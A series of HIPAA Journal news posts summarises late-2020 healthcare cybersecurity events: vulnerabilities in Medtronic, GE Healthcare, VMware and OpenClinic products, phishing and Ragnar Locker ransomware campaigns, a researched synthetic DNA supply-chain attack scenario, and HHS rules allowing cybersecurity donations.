Healthcare Cybersecurity

Serious Vulnerabilities Identified in Medtronic MyCareLink Smart Patient Readers

Posted by HIPAA Journal

Three serious vulnerabilities have been identified in Medtronic MyCareLink (MCL) Smart Patient Readers, which could potentially be exploited to gain access to and modify patient data from the paired implanted cardiac device. Exploitation of the vulnerabilities together could permit remote code execution on the MCL Smart Patient Reader, allowing an attacker to take control of a paired cardiac device. In order to exploit the vulnerabilities, an attacker would need to be within Bluetooth signal proximity to the vulnerable product.

The flaws are present in all versions of the MCL Smart Model 25000 Patient Reader. The first vulnerability, tracked as CVE-2020-25183, is an authentication protocol vulnerability. The method used to authenticate the MCL Smart Patient Reader and the Medtronic MyCareLink Smart mobile app can be bypassed. An attacker using another mobile device or malicious app on the patient’s smartphone could authenticate to the patient’s MCL Smart Patient Reader, tricking it into believing it is communicating with the patient’s smartphone app. The vulnerability has been assigned a CVSS v3 base score of 8.0 out of 10.

A heap-based buffer overflow event can be triggered in the MCL Smart Patient Reader software stack by an authenticated attacker running a debug command. Once triggered, an attacker could then remotely execute code on the vulnerable MCL Smart Patient Reader, potentially allowing the attacker to take control of the device. The vulnerability is tracked as CVE-2020-27252 and has been assigned a CVSS v3 base score of 8.8 out of 10.

MCL Smart Patient Readers are also vulnerable to a race condition in the software update system, which could be exploited to upload and execute unsigned firmware on the Patient Reader. This vulnerability could also allow remote execution of arbitrary code on the MCL Smart Patient Reader and could give an attacker control of the device. The flaw is tracked as CVE-2020-27252 and has been assigned a CVSS v3 base score of 8.8 out of 10.

The vulnerabilities were identified by researchers at the Israeli firm Sternum, with UC Santa Barbara, University of Florida, and University of Michigan researchers independently identifying the improper authentication vulnerability.

The flaws were reported to Medtronic which has now released a firmware update to fix the vulnerabilities. The firmware update can be applied by updating the MyCareLink Smartapp via the associated mobile application store. Updating to mobile application version v5.2 will ensure the update is applied on the next use; however, in order for the patch to work, the user’s smartphone must be running iOS 10 or above or Android 6.0 or above.

Users have also been advised to maintain strong physical control over their home monitors and to restrict use of the home monitors to private environments. Patients should only use home monitors that have been obtained directly from their healthcare provider or a Medtronic representative.

Medtronic has also taken steps to improve security, including implementing Sternum’s enhanced integrity validation (EIV) technology which provides early detection and real-time mitigation of known vulnerability exploitation attempts, and Sternum’s advanced detection system technology, which enables device-level logging and monitoring of all device activity and behavior.

The post Serious Vulnerabilities Identified in Medtronic MyCareLink Smart Patient Readers appeared first on HIPAA Journal.

Russian State-Sponsored Hackers Exploiting Vulnerability in VMWare Virtual Workspaces

Posted by HIPAA Journal

The U.S. National Security Agency (NSA) has issued a cybersecurity advisory warning Russian state-sponsored hacking groups are targeting a vulnerability in VMWare virtual workspaces used to support remote working.

The flaw, tracked as CVE-2020-4006, is present in certain versions of VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector products and is being exploited to gain access to enterprise networks and protected data on the affected systems.

The flaw is a command-injection vulnerability in the administrative configurator component of the affected products. The vulnerability can be exploited remotely by an attacker with valid credentials and access to the administrative configurator on port 8443. If successfully exploited, an attacker would be able to execute commands with unrestricted privileges on the operating system and access sensitive data.

VMWare released a patch to correct the vulnerability on December 3, 2020 and also published information to help network defenders identify networks that have already been compromised, along with steps to eradicate threat actors who have already exploited the flaw.

The flaw may not have been given priority by system administrators as it was only rated by VMWare as ‘important’ severity, with a CVSS v3 base score of 7.2 out of 10 assigned to the flaw. The relatively low severity rating is because a valid password must be supplied to exploit the flaw and the account is internal to the impacted products. However, as the NSA explained, the Russian threat actors are already exploiting the flaw using stolen credentials.

In attacks observed by the NSA, the hackers exploited the command injection flaw, installed a web shell, followed by malicious activity where SAML authentication assertions were generated and sent to Microsoft Active Directory Federation Services (ADFS), granting access to protected data.

The best way of preventing exploitation is to apply the VMWare patch as soon as possible. If it is not possible to apply the patch, it is important to ensure that strong, unique passwords are set to protect against brute force attempts to crack passwords. The NSA also recommends administrators ensure the web-based management interface is not accessible over the Internet.

Strong passwords will not prevent the flaw from being exploited and will not provide protection if the flaw has already been exploited. “It is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration,” explained the NSA. “Otherwise, SAML assertions could be forged, granting access to numerous resources.” If integrating authentication servers with ADFS, the NSA recommends following Microsoft’s best practices, especially for securing SAML assertions. Multi-factor authentication should also be implemented.

The NSA has published a workaround that can be used to prevent exploitation until the patch can be applied and recommends reviewing and hardening configurations and monitoring federated authentication providers.

Unfortunately, detecting exploitation of the vulnerability can be difficult. “Network-based indicators are unlikely to be effective at detecting exploitation since the activity occurs exclusively inside an encrypted transport layer security (TLS) tunnel associated with the web interface,” explained the NSA in the advisory. The intrusion can, however, be identified from server logs that can be found at /opt/vmware/horizon/workspace/logs/configurator.log. The present of an exit statement followed by a three-digit number within the configurator.log suggests the flaw may already have been exploited.

VMWare recommends all customers refer to VMSA-2020-0027 for information on this vulnerability.

The post Russian State-Sponsored Hackers Exploiting Vulnerability in VMWare Virtual Workspaces appeared first on HIPAA Journal.

Critical Vulnerabilities Identified in More Than 100 GE Healthcare Imaging and Ultrasound Products

Posted by HIPAA Journal

Two critical severity vulnerabilities have been identified in GE Healthcare medical imaging devices that allow remote code execution and access/alteration of sensitive patient data. The vulnerabilities affect GE Healthcare’s proprietary management software and impact more than 100 GE Healthcare imaging devices including MRI, Ultrasound, Advanced Visualization, Interventional, X-Ray, Mammography, Computed Tomography, Nuclear Medicine and PET/CT devices.

Affected GE Healthcare Products

Device Product Families
MRI Brivo, Optima, Signa
Ultrasound EchoPAC, Image Vault, LOGIQ, Vivid, Voluson
Advanced Visualization AW
Interventional Innova, Optima
X-Ray AMX, Brivo, Definium, Discovery, Optima, Precision
Mammography Seno, Senographe Pristina
Computed Tomography BrightSpeed, Brivo, Discovery, Frontier LightSpeed, Optima, Revolution
Nuclear Medicine, PET/CT Brivo, Discovery, Infinia Optima, PET Discovery, PETtrace, Ventri, Xeleris

The vulnerabilities were identified by Lior Bar Yosef and Elad Luz of CyberMDX who reported them to GE Healthcare in May 2020. CyberMDX has dubbed the flaws MDHexRay, with both being assigned a CVSS v3 base score of 9.8 out of 10.

The first flaw is due to unprotected transport of credentials across the network and is tracked as CVE-2020-25175. The second flaw is due to the exposure of sensitive system information to an unauthorized control sphere, which could allow exposed/default credentials to be used to access or modify sensitive information.

The CyberMDX researchers found GE Healthcare’s maintenance protocols relied on having certain ports open and accessible to GE Healthcare to allow the devices to be remotely managed over the internet. While it is necessary for credentials to be used for the update and maintenance software, GE Healthcare would only change the default credentials at the request of a customer and the default credentials used by GE Healthcare could be easily found online. It is unclear how many customers requested the default credentials be changed.

Exploiting the vulnerabilities would require an attacker to already be connected to the hospital network. The default credentials could then be used to access vulnerable connected imaging devices and any data stored on the devices. The medical devices could not be accessed over the Internet by unauthorized users who do not have access to a hospital’s internal network. There are no reported cases of the vulnerabilities being exploited in the wild.

GE Healthcare has assessed the vulnerabilities and conducted a risk assessment and determined there are no patient safety concerns; however, the flaws do pose a risk to patient privacy. It would also be possible for an attacker to modify patient data, which could potentially influence the results of certain therapies. Since data only remains on the imaging machines for a limited amount of time before being transferred to PACS, the patient information that could be obtained or modified would be limited.

According to the DHS Cybersecurity and Infrastructure Security Agency (CISA), “If exploited, these vulnerabilities could allow an attacker to gain access to affected devices in a way that is comparable with GE (remote) service user privileges. A successful exploitation could expose sensitive data such as a limited set of patient health information (PHI) or could allow the attacker to run arbitrary code, which might impact the availability of the system and allow manipulation of PHI.”

While there is no patch available to correct the vulnerabilities, it is possible to mitigate the issue by changing the default password; however, that cannot be performed by end users, only by GE Healthcare. GE Healthcare is now notifying its customers and is helping affected customers change the default password and ensure that their product firewalls are set up properly. Customers are also being advised to follow best practices for network management and security. CyberMDX recommends restricting ports 21 (FTP), 22 (SSH), 23 (Telnet), and 512 (REXEC) to listening state.

The post Critical Vulnerabilities Identified in More Than 100 GE Healthcare Imaging and Ultrasound Products appeared first on HIPAA Journal.

COVID-19 Vaccine Cold Chain Organizations Targeted in Global Phishing Campaign

Posted by HIPAA Journal

The Cybersecurity Infrastructure and Security Agency has issued a warning about a global spear phishing campaign targeting organizations in the cold storage and supply chain that are involved with the distribution of COVID-19 vaccines.

Two of the first vaccines to be produced must be kept and low temperatures during storage and transit prior to being administered. The Pfizer/BioNTech vaccine must be kept at -94°F (-70°C) and the Moderna vaccine at -4°F (-20°C), so cold chain organizations are a key element of the supply chain.

At the start of the pandemic, IBM X-Force established a cyber threat task force to track threats targeting organizations involved in the fight against COVID-19. The task force recently published a report about an ongoing spear phishing campaign that started in September 2020 which is targeting organizations supporting the Cold Chain Equipment Optimization Platform program. The program was launched in 2015 by the United Nations Children’s Fund and partner organizations to distribute vaccines worldwide.

Phishing emails have been sent to executives in sales, procurement, information technology, and finance who are likely to be involved in efforts to support the vaccine cold chain. Targeted organizations are believed to be providers of material support to meet the transportation needs within the COVID-19 cold chain.

The phishing emails appear to have been sent by an executive at Haier Biomedical, a Chinese qualified supplier of the Cold Chain Equipment Optimization Platform program. Haier Biomedical is the only complete cold chain provider in the world, so it is an ideal target for impersonation in the campaign.

The emails intercepted by IBM X-Force researchers had malicious HTML attachments that open locally and prompt the recipients to enter their credentials in order to open the file. The captured credentials can then be used to intercept internal communications about the process, methods, and plans to distribute COVID-19 vaccines. Once credentials are obtained, the attackers can move laterally through networks, conduct cyber espionage, and steal additional information for use in further attacks.

IBM reports that the phishing campaign spans 6 countries and, so far, 10 global organizations are known to have been targeted, as well as the European Commission’s Directorate-General for Taxation and Customs Union. Targeted organizations span several industry sectors including energy, manufacturing, software, and information technology. The researchers were unable to confirm the extent to which the campaign has been successful.

Based on the precision targeting of executives in specific global organizations involved in vaccine storage and transport and the lack of a clear path to cash out, the campaign is likely being conducted by a nation state threat actor. IBM X-Force suggests that cybercriminal organizations would be unlikely to invest the time, money, and resources into such a campaign targeting so many global organizations.

IBM X-Force recommends organizations involved in the cold storage and transport chain should take steps to mitigate the risks from phishing including creating and testing incident response plans, sharing and ingesting threat intelligence, assessing their third-party ecosystems, applying a zero-trust approach to security, using multi-factor authentication across the organization, using endpoint protection and response tools, and conducting regular email security awareness training.

In addition to the threat from phishing, organizations involved in the cold storage chain should take steps to protect against ransomware attacks as they will be a likely target over the coming weeks and months. In November, the U.S. based cold storage company Americold Realty Trust was the victim of a cyberattack suspected to have involved the use of ransomware. The company was reportedly negotiating with Chicago Rockford international Airport to assist with the distribution of COVID-19 vaccines.

The post COVID-19 Vaccine Cold Chain Organizations Targeted in Global Phishing Campaign appeared first on HIPAA Journal.

Vulnerabilities in OpenClinic Application Could Allow Unauthorized PHI Access

Posted by HIPAA Journal

Four vulnerabilities have been identified in the OpenClinic application, the most severe of which could allow authentication to be bypassed and protected health information (PHI) to be viewed from the application by unauthorized users.

OpenClinic is an open source, PHP-based health record management software that is used in many private clinics, hospitals, and physician practices for administration, clinical and financial tasks.

A BishopFox Labs researcher has identified four vulnerabilities in the software which have yet to be corrected. The most serious vulnerability involves missing authentication, which could be exploited to gain access to any patient’s medical test results. Authenticated users of the platform can upload patient’s test results to the application, which are loaded into the /tests/ directory. Requests for files in that directory do not require users to be authenticated to the application to return and display the test results.

In order for the test results to be obtained, an unauthenticated user would need to guess the names of the files; however, the BishopFox researcher explained that medical test filenames can be predictable and could be obtained through log files on the server or other network infrastructure. The vulnerability (CVE-2020-28937) can be exploited remotely and has received a high severity rating.

A high severity insecure file upload vulnerability (CVE-2020-28939) was identified which would allow users with administrative or administrator user roles to upload malicious files. The researcher found those users who have rights to enter medical tests for patients could upload files using the /openclinic/medical/test_new.php endpoint, which does not restrict the types of files that can be uploaded to the application. Consequently, it would be possible to upload web shells, which could be used for arbitrary code execution on the application server. A malicious actor with an administrative or administrator user role could obtain sensitive information, escalate privileges, install malicious software, or gain access to the internal network.

The third vulnerability (CVE-2020-28938) is a medium-severity stored cross-site scripting vulnerability that allows application users to force actions on behalf of other users. Measures have been included in the application to prevent cross-site scripting; however, those controls can be bypassed. A low-privileged user could exploit the vulnerability by getting an Administrator to click a malicious link, which could be used to execute a payload that creates a new Administrator account for the low privileged user.

The fourth vulnerability is a low-severity path traversal flaw that could be exploited in a denial of service attack affecting upload functionality. The flaw allows an authenticated attacker to write files to the application server’s filesystem.

Gerben Kleijn, Senior Security Consultant, Bishop Fox, was credited with discovering the flaws. “At the time of this publication there is no version of OpenClinic available that does not suffer from the identified vulnerabilities, and the recommendation is to switch to a different medical records management software,” said Kleijn in a blog post announcing the vulnerabilities.

These are not the first serious vulnerabilities to be identified in OpenClinic this year. In July, an alert was issued by CISA about 12 vulnerabilities in the software, 3 of which were rated critical and 2 high severity.

The post Vulnerabilities in OpenClinic Application Could Allow Unauthorized PHI Access appeared first on HIPAA Journal.

Researchers Describe Possible Synthetic DNA Supply Chain Attack

Posted by HIPAA Journal

A team of researchers at Ben-Gurion University in Israel have described a possible bioterrorist attack scenario in which the supply chain of synthetic DNA could be compromised. DNA synthesis providers could be tricked into producing harmful DNA sequences, bypassing current security controls, and delivering those sequences to healthcare customers.

Synthetic DNA is currently produced for research purposes and is available in many ready-to-use forms. Clients of DNA synthesis providers specify the DNA sequences they require and the DNA synthesis company generates the requested sequences to order and ships them to their customers.

There are safety controls in place to prevent DNA being synthesized that could be harmful, but the Ben-Gurion University researchers point out that those safety checks are insufficient. Hackers could potentially exploit security weaknesses and inject rogue genetic information into the synthesis process, unbeknown to the customers or DNA synthesis providers. For example, rogue genetic material could be inserted that encodes for a harmful protein or a toxin.

The researchers describe an attack scenario where a bioterrorist could conduct an attack that sees harmful biological material ordered, produced, and delivered to customers, without the attacker ever having to come into contact with lab components or biological materials. The researchers say the hypothetical attack method they describe is an “end-to-end cyberbiological attack” that can be performed remotely using a computer with a carefully crafted spear phishing email that delivers a malicious browser plug-in.

An attacker could craft a spear phishing email targeting an individual and use social engineering techniques to get them to install a malicious browser plug-in on their computer. When a genuine order is placed for a specific DNA sequence, the attacker would perform a man-in-the-middle attack and change the requested DNA sequence sent to the DNA synthesis provider, without the knowledge of the person submitting the order.

Checks would be performed by the DNA synthesis company to screen out potentially dangerous sequences. Provided those checks are passed, DNA synthesis would begin, and the product would then be shipped to the customer. The sequence would be checked by the customer, but the same malicious plugin could return the requested sequence. The DNA sequence with the rogue DNA would then be used in the belief it is the sequence requested.

Source: Ben-Gurion University

The research paper describing the threat and the potential attack method – Cyberbiosecurity: Remote DNA Injection Threat in Synthetic Biology – was recently published in Nature Biotechnology. The image above shows the attack process with the malicious steps detailed in red.

The Department of Health and Human Services has produced HHS Screening Framework Guidance for Providers of Synthetic Double-Stranded DNA and requires DNA synthesis providers to screen double stranded DNA. The screening process should highlight any harmful sequences and would ensure that those sequences were not released to customers; however, the researchers point out that there is currently no single, comprehensive database of all pathogenic sequences and it is potentially possible to bypass these checks.

“Currently, the software stack used to develop synthetic genes is loosely secured, allowing the injection of rogue genetic information into biological systems by a cybercriminal with an electronic foothold within an organization’s premises,” explained the researchers. The researchers also demonstrated that through the use of obfuscation, 16 out of 50 DNA samples were not detected by screening systems.

A bioterrorist attack of this nature would be complex, which limits the potential for such an attack to occur, but given the potentially devastating consequences, more rigorous security controls need to be implemented. The current safety mechanisms have been put in place to prevent the deliberate or accidental synthesis of harmful DNA, but the researchers explain that those safety mechanisms have not been adapted to reflect recent developments in synthetic biology and cyberwarfare.

“Biosecurity researchers agree that an improved DNA screening methodology is required to prevent bioterrorists and careless enthusiasts from generating dangerous substances in their labs,” explained the researchers in the report.

The post Researchers Describe Possible Synthetic DNA Supply Chain Attack appeared first on HIPAA Journal.

FBI Issues Warning About Increasing Ragnar Locker Ransomware Activity

Posted by HIPAA Journal

Threat actors using Ragnar Locker ransomware have stepped up their attacks and have been targeting businesses and organizations in many sectors, according to a recent private industry alert from the Federal Bureau of Investigation (FBI).

Ragnar Locker ransomware was first identified by security researchers in April 2019, with the first known attack targeting a large corporation that was issued with an $11 ransom demand for the keys to decrypt files and ensure the secure deletion of the 10 terabytes of sensitive data stolen in the attack.

While not named in the FBI alert, the attack appears to have been on the multinational energy company, Energias de Portugal. The gang was also behind the ransomware attacks on the Italian drinks giant Campari and the Japanese gaming firm Capcom.

Since that attack, the number of Ragnar Locker victims has been steadily growing. Attacks have been successfully conducted on cloud service providers, and companies in communication, construction, travel, enterprise software, and other industries.

As with other human-operated ransomware attacks, the threat actors behind Ragnar Locker ransomware conduct targeted attacks to gain a foothold in victims’ networks, then have a reconnaissance phase where they identify network resources, sensitive data, and backup files. Sensitive data is exfiltrated, then the final stage of the attack involves the deployment of ransomware on all connected devices.

The Ragnar Locker gang uses a variety of obfuscation techniques to evade security solutions, with those techniques changing frequently. Ragnar Locker ransomware attacks are easily distinguished, as the encrypted files are given a unique extension – .RGNR_<ID>, with the ID created using a hash of the computer’s NETBIOS name. The attackers also identify themselves in the ransom note dropped on victim devices.

The initial attack vector is commonly Remote Desktop Protocol using stolen credentials or brute force attempts to guess weak passwords. The gang uses VMProtect, UPX, and custom packing algorithms and encrypt files from Windows XP virtual machines that have been deployed on victims’ networks. The attackers terminate security processes, including programs commonly used by managed service providers to monitor their clients’ networks, and encrypt files on all connected drives. Shadow Volume copies are deleted to make it harder for victims to recover files without paying the ransom.

Many ransomware variants search for files of interest and encrypt files with specific extensions; however, Ragnar Locker will encrypt all files in folders that have not been previously marked to be skipped. The untouched folders include Windows, ProgramData, and web browser directories.

The attackers steal data and use the threat of publication to apply pressure on companies to pay the ransom. It may be possible to restore encrypted files from backups, but the threat of the release of sensitive data may be sufficient to ensure the ransom is paid. The gang recently took out Facebook ads using a compromised account to pressure Campari into paying the ransom.

To prevent Ragnar Locker ransomware attacks it is necessary to block the initial attack vector. RDP should be disabled if possible, strong passwords should be set, multi-factor authentication implemented, and all computers and systems should be kept up to date with patches applied promptly. Antivirus software should be installed and set to update automatically, and remote connections should only be possible through a VPN, and never via unsecured, public Wi-Fi networks.

To ensure that files can be recovered in the event of a successful attack, backups should be regularly performed, and copies of backups stored on a non-networked device. The FBI also points out that it should not be possible to modify or delete backups from the system where the data resides.

The post FBI Issues Warning About Increasing Ragnar Locker Ransomware Activity appeared first on HIPAA Journal.

Free Google Services Abused in Phishing Campaigns

Posted by HIPAA Journal

Several phishing campaigns have been identified that are using free Google services to bypass email security gateways and ensure malicious messages are delivered to inboxes.

Phishing emails often include hyperlinks that direct users to websites hosting phishing forms that harvest credentials. Email security gateways use a variety of methods to detect these malicious hyperlinks, including blacklists of known malicious websites, scoring of domains, and visiting the links to analyze the content on the destination website. If the links are determined to be suspicious or malicious, the emails are quarantined or rejected. However, by using links to legitimate Google services, phishers are managing to bypass these security measures and ensure their messages are delivered.

The use of Google services by phishers is nothing new; however, security researchers at Arborblox have identified an uptick in this activity that has coincided with increased adoption of remote working. The researchers identified 5 campaigns abusing free Google services such as Google Forms, Google Drive, Google Sites, and Google Docs.  It is not just Google services that are being abused, as campaigns have been detected that abuse other free cloud services such as Microsoft OneDrive, Dropbox, Webflow, SendGrid, and Amazon Simple Email Service.

One of the campaigns impersonated American Express, with the initial message requesting account validation as the user was found to have missed information when validating their card. The emails direct the user to a phishing page created using Google Forms. The form includes the official American Express logo and a short questionnaire requesting information that can be used by the attackers to gain access to their credit card account – login information, phone number, card number and security code, and security questions and answers.

Since the link in the email directs the user to Google Forms – a legitimate Google domain and service – it is unlikely that an email security gateway would identify the URL as malicious. “Google’s domain is inherently trustworthy and Google forms are used for several legitimate reasons, no email security filter would realistically block this link on day zero,” explained the Armorblox researchers.

Another campaign used Google Forms in a classic phishing lure. The emails appear to have been sent by a childless widow who has been diagnosed with terminal cancer. She is looking to donate her fortune to good causes, with the recipient of the message told that the widow would like them to make donations to good causes on her behalf. The hyperlink directs the user to an untitled Google Form. Should anyone proceed and submit an answer to the untitled question, they will be shortlisted for further extortion attempts.

A campaign was detected that used a fake email login page hosted on Google’s Firebase mobile platform, which is used to create apps, files, and images. The emails in this campaign impersonate the security team and claim important emails have not been delivered due to the email storage quota being exceeded. The campaign targets email login credentials. The link to the Firebase would be unlikely to be identified as malicious since it is a legitimate cloud storage repository.

Google Docs has also been abused in a campaign in which the payroll team is impersonated, with the Google Docs document containing a link to a phishing page where sensitive information is harvested. Since the initial link is to a legitimate and commonly used Google service, it is unlikely to be blocked by email security solutions. While some email solutions would be able to identify the malicious link in the Google-hosted document, various redirects are used to obfuscate the malicious link.

A campaign was also identified that impersonated the user’s IT department security team and Microsoft Teams, using a fake Microsoft login page hosted on Google Sites. Google Sites is a legitimate service that allows individuals to easily create webpages, but in this case has been used to create a webpage hosting a phishing form, complete with the genuine Microsoft logo.

Campaigns abusing trust in Google Docs have also been identified by researchers at Area 1 Security. The messages in that campaign impersonated the HR department and claimed the recipient had been terminated, with the Google Docs document providing details of the termination and severance pay. The document contains a malicious macro that, if allowed to run, will download the Bazar Backdoor and Buer loader malware. IRONSCALES also recently reported that around half of all sophisticated phishing campaigns were successfully bypassing the leading email security gateways.

The campaigns range from highly targeted attacks on specific groups of individuals, such as HR and payroll departments, to untargeted large-scale ‘spray and pray’ campaigns to obtain as many credentials as possible, using more general lures.

These campaigns highlight the need for advanced security solutions that are capable of identifying and blocking phishing emails that abuse legitimate cloud services and the need for ongoing security awareness training for employees to help them identify phishing emails that evade detection by their organization’s cybersecurity defenses.

The post Free Google Services Abused in Phishing Campaigns appeared first on HIPAA Journal.

HHS Releases Final Rules with Safe Harbors for Cybersecurity Donations

Posted by HIPAA Journal

On Friday last week, the Department of Health and Human Services’ Centers for Medicare and Medicaid Services (CMS) and Office of Inspector General (OIG) published final rules that aim to improve the coordination of care and reduce regulatory barriers. Both final rules contain safe harbor provisions that allow hospitals and healthcare delivery systems to donate cybersecurity technology to physician practices.

The CMS released the final version of the 627-page Modernizing and Clarifying the Physician Self-Referral Regulations, commonly called Stark Law, and the OIG finalized revisions to the 1,049-page Safe Harbors Under the Anti-Kickback Statute and Civil Monetary Penalty Rules Regarding Beneficiary Inducements.

Physician practices often have limited resources, which makes it difficult for them to implement solutions to address cybersecurity risks. Without the necessary protections, sensitive healthcare data could be accessed by unauthorized individuals, stolen, deleted, or encrypted by threat actors. Threat actors could also conduct attacks on small physician practices and use them to gain access to the healthcare systems to which they connect.

When the rules were first proposed, commenters emphasized the need for a safe harbor to allow non-abusive, beneficial arrangements between physicians and other healthcare providers, such donations of cybersecurity solutions to help safeguard the healthcare ecosystem. The CMS first proposed the changes in October 2019 as part of the Regulatory Sprint to Coordinated Care.

The CMS final rule clarifies the Stark Law exceptions concerning donations of electronic health record donations to physicians, expanding the EHR exception to include cybersecurity software and services. A standalone exception has also been introduced for broader cybersecurity donations, including donations of cybersecurity hardware.

“These finalized exceptions provide new flexibility for certain arrangements, such as donations of cybersecurity technology that safeguard the integrity of the healthcare ecosystem, regardless of whether the parties operate in a fee-for-service or value-based payment system,” said the CMS.

The changes recognize the risk of cyberattacks on the healthcare sector and create a safe harbor for cybersecurity technology and services to protect cybersecurity-related hardware, and will help to ensure that cybersecurity software and hardware are available to all healthcare providers of all sizes.

The safe harbor applies to, but is not limited to, “software that provides malware prevention, software security measures to protect endpoints that allow for network access control, business continuity software, data protection and encryption and email traffic filtering.” The exception also covers the “hardware that is necessary and used predominantly to implement, maintain or re-establish cybersecurity” and a broad range of cybersecurity services such as updating and maintaining software and cybersecurity training services. There is no distinction in the rule between locally installed and cloud-based cybersecurity solutions.

Under the cybersecurity exception, recipients are not required to contribute to the cost of the donated cybersecurity technology or services. Under the EHR exception, the cost contribution requirement for donations of EHR items or services is retained.

“It is our position that allowing entities to donate cybersecurity technology and related services to physicians will lead to strengthening of the entire health care ecosystem,” said the HHS.

The final rules are due to be published in the federal register on December 2, 2020 and are expected to take effect on January 19, 2021.

The post HHS Releases Final Rules with Safe Harbors for Cybersecurity Donations appeared first on HIPAA Journal.